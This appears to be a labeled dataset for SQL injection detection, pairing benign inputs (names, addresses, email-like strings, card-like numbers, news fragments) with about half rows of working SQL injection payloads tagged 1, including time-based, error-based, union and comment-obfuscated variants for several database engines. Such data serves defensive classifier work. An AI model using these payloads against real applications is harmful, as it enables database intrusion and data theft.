1%" ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( "%" = "	1
rahue	0
praxila	0
barrio de mu	0
News reports NSA swept millions phone records Europe frayed relations U	0
')/**/HavInG/**/5093=5093/**/And/**/('eaOt'/**/LIKe/**/'eaOt	1
select pg_sleep ( 5 ) and ( ( "byhx" like "byhx	1
select * from users where id = 1 %!<@ or 1 = 1 -- 1	1
in4o75u1t4!bili0a1	0
22997473a	0
75 1970	0
berber_wosper@foreignoffice.kn	0
;SELECT PG_SLEEP(5)--	1
1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( 'nqol' = 'nqol	1
38788994t	0
1%" and 2805 = 1345	1
cyril	0
kirov@ofertachina.fm	0
34514395c	0
He also stated increasing number employed persons looking long-term care support relatives	0
1%" ) ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --	1
1 ) where 9149 = 9149 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --	1
')/**/WAITFOR/**/DELAY/**/'0:0:5'--/**/mhth	1
22200	0
shepperd	0
50835477a	0
')/**/aS/**/djeS/**/wHErE/**/8815=8815/**/oR/**/1330=(sELEcT/**/cOUnT(*)/**/FroM/**/SYSMaSTER:SYSPAGHDR)--	1
larese	0
1%" ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( "%" = "	1
select case when 5346 = 8272 then 1 else null end--	1
babilas	0
Password: (SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(CASE WHEN (8944=8944) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113))	1
" OR 4695=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)-- cYcB	1
1" ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( "gimc" like "gimc	1
select * from users where id = '1' union select $ .,@@VERSION -- 1'	1
nicforo	0
heldo	0
lezama	0
com/is?-WZx-uhyLezKNiYLvAbKL3W4oh5F749nr2KUmFFjZOU <email_address> <![CDATA[elwoodbuckley@freenet	0
1%' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and '%' = '	1
');SELECT SLEEP(5)-- RlwS	1
select * from users where id = 1 +$ . or 1 = 1 -- 1	1
They moved Financial District , via Wall Street , visit 9 / 11 memorial	0
temprano canavoso	0
1' ) ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 'narn' = 'narn	1
`)/**/WHErE/**/4057=4057/**/RlIkE/**/(sELEcT/**/2726/**/FROm/**/(sELEcT(SlEep(5)))sYqr)--/**/LGZu	1
aula	0
Complete strangers arena thought phenomenal wanted photos taken	0
-5698' ) ) as egjr where 5586 = 5586 union all select 5586,5586,5586--	1
goldman@casabolsa43.rw	0
oso, el	0
4277353398050908	0
This rule, equally arduous actual intellectual life, may serve whole distinction greatness meanness	0
-1573" ) union all select 3928,3928,3928,3928--	1
AND (SELECT 3424 FROM (SELECT(SLEEP(5)))GAAi)	1
5205292790214964	0
1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( 'dbsm' = 'dbsm	1
1 ) ) as pmff where 6649 = 6649	1
1%" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and "%" = "	1
Password: -8789")) OR 4414=(SELECT (CASE WHEN (4414=3133) THEN 4414 ELSE (SELECT 3133 UNION SELECT 1088) END))-- euNd	1
1 ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( 8554 = 8554	1
80396628j	0
1 ) as ujjg where 3125 = 3125 union all select null,null,null,null,null,null#	1
33245427p	0
As always , south stand left end , finally stand resumed usual role loudest section stadium	0
12965	0
8217	0
-2516 ) where 3349 = 3349 or 4855 = 1806--	1
aliseda fullat	0
"))) AND 3085=6689-- mRAm	1
hoehn	0
1' ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 'pqxe' like 'pqxe	1
)))/**/Or/**/noT/**/2887=2887#	1
4a2ho4a2o	0
marty@telogis.mv	0
3tn changes hands day	0
or a = a	1
1' ) ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'dhqz' = 'dhqz	1
1657191621298298	0
-4615' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) )	1
1 ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --	1
robledo	0
curi piccech	0
))/**/As/**/lpDH/**/wHEre/**/7325=7325/**/rLiKe/**/(SELECt/**/8349/**/frOM/**/(SELECt(SLEEp(5)))WNzd)#	1
select sleep ( 5 ) and ( "innk" = "innk	1
27340064x	0
lierde.vaverka@2horas.wf	0
%' ORDER BY 1-- KmFC	1
1' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'hbld' = 'hbld	1
+(SeLEcT/**/CHar(88)+CHar(80)+CHar(100)+CHar(71)/**/wheRe/**/2067=2067/**/aNd/**/6727/**/In/**/(SeLEcT/**/(CHar(113)+CHar(98)+CHar(106)+CHar(120)+CHar(113)+(SeLEcT/**/(CasE/**/wHeN/**/(6727=6727)/**/tHEN/**/CHar(49)/**/eLsE/**/CHar(48)/**/eND))+CHar(113)+CHar(122)+CHar(113)+CHar(113)+CHar(113))))+	1
92937803r	0
04681808c	0
To end , competent working group met morning	0
'/**/Or/**/(sElECt/**/8328/**/fRoM/**/(sElECt(SlEep(5)))gCVh)/**/anD/**/'mbAT'='mbAT	1
1' ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --	1
1' ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'wgbh' = 'wgbh	1
madrigal del monte	0
select * from users where id = 1 or 1#", union select null,version ( ) -- 1	1
1' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and 'eovg' like 'eovg	1
xanto	0
-9737" ) ) ) order by 1--	1
plaza benidorm 155, 5?e	0
marco polo	0
) AND 9690 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9690=9690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113))) AND (1147=1147	1
1 ) as cjmt where 4839 = 4839 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --	1
]-(SeLecT/**/0/**/WHEre/**/9002=9002;SeLecT/**/SLeeP(5))	1
' IN BOOLEAN MODE) ORDER BY 9600#	1
;WAITFOR/**/DELAY/**/'0:0:5'--/**/hxhZ	1
transki	0
"))/**/rlIkE/**/(seLecT/**/(CasE/**/wheN/**/(4676=9463)/**/thEn/**/0x7061737373/**/eLSE/**/0x28/**/eNd))/**/And/**/(("UfRz"="UfRz	1
")))/**/RLIke/**/sLeEP(5)#	1
1' ) as noqp where 4042 = 4042 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --	1
';SELECT SLEEP(5)-- xyoO	1
1'|| ( select 'xlmt' where 1664 = 1664	1
"))/**/aS/**/VBdr/**/wHErE/**/5859=5859;Begin/**/DBMS_LOCK.slEEP(5);/**/ENd--/**/puxx	1
1' ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --	1
1 ) as qwsa where 2874 = 2874	1
;SELECT (CASE WHEN (3811=3811) THEN 3811 ELSE 1/(SELECT 0) END)--	1
)/**/WHere/**/1932=1932/**/oR/**/NoT/**/2548=6672--/**/arfP	1
The Administrative Department Deutsche Bahn &apos;s reconstruction plans investigated Breinlinger Engineering Office , doubts whether planned connection Geroltzhäuser Weg straightforward	0
1" and elt ( 4249 = 4249,7259 )	1
)/**/Or/**/(SEleCT/**/2155/**/froM/**/(SEleCT(SleEP(5)))XQGM)#	1
4542	0
Meanwhile , former chief reporter Neville Thurlbeck former reporter James Weatherup oversaw surveillance Ms Pawlby &apos;s movements	0
1" and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and "hvwv" = "hvwv	1
calle alhondiga, 103, 12d	0
50248210h	0
mara	0
%' OR NOT 6008=9161 AND 'oxru%'='oxru	1
1' ) as eymt where 3911 = 3911 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --	1
m	0
New airliners far reliant electrical systems previous generations aircraft , also designed approved FAA resistant electronic interference	0
1" where 1982 = 1982	1
berrell@lingote.com.nf	0
)/**/oR/**/sleEP(5)#	1
Email: -8436'/**/wHErE/**/2877=2877/**/Or/**/5291=3196--/**/elZP	1
The band plays lively polkas marches	0
andrzej	0
-2460%" ) or ( 2660 = 5767 ) *5767 and ( "%" = "	1
1' in boolean mode ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #	1
emil	0
39313	0
')))/**/haviNG/**/2029=3018/**/And/**/((('GoPr'='GoPr	1
')/**/As/**/drOc/**/WHERe/**/6968=6968;(sELecT/**/*/**/FROm/**/(sELecT(SLEep(5)))iGqZ)#	1
8 percent month October	0
1 ) as lfra where 2669 = 2669 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --	1
1%' ) ) waitfor delay '0:0:5' and ( ( '%' = '	1
1'+ ( select 'mzee' where 5984 = 5984	1
-5849 ) union all select 6168,6168,6168,6168,6168,6168,6168,6168#	1
1%' ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #	1
4662359455480921	0
OR SLEEP(5)-- dyaz	1
1 ) where 7199 = 7199 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --	1
Additionally , Defender Challenge provide training test day February , well option compete desert events North Africa Middle East	0
7548	0
arrechea bellveh	0
It &apos;s backbreaking pace , village musicians usually help keep team motivated	0
7058252446193830	0
1" ) ) ) union all select null,null,null,null,null#	1
The 46-year-old actress revealed latest look LA Wednesday shared snap Twitter page	0
iif ( 1157 = 4542,1,1/0 )	1
")/**/aS/**/Wzbt/**/WheRe/**/4901=4901;SelEcT/**/CaSE/**/WHeN/**/8800=8800/**/Then/**/1/**/ElSe/**/nuLL/**/eNd--	1
1 ) ) as sipp where 1999 = 1999 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --	1
Anja Schlichter managed tournament The organisation tournament placed trusty hands Anja Schlichter , supported Carmen Müller Inga Kronemeyer	0
'/**/In/**/BOoLeAn/**/mODe)/**/oR/**/slEEP(5)#	1
cervera brcena	0
7930754215612383	0
21392437e	0
) HAVING 8504=2817 AND (4910=4910	1
molas madan	0
1%' or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --	1
select * from users where id = 1 or "%?" or 1 = 1 -- 1	1
[truncated: 2,001 more rows]
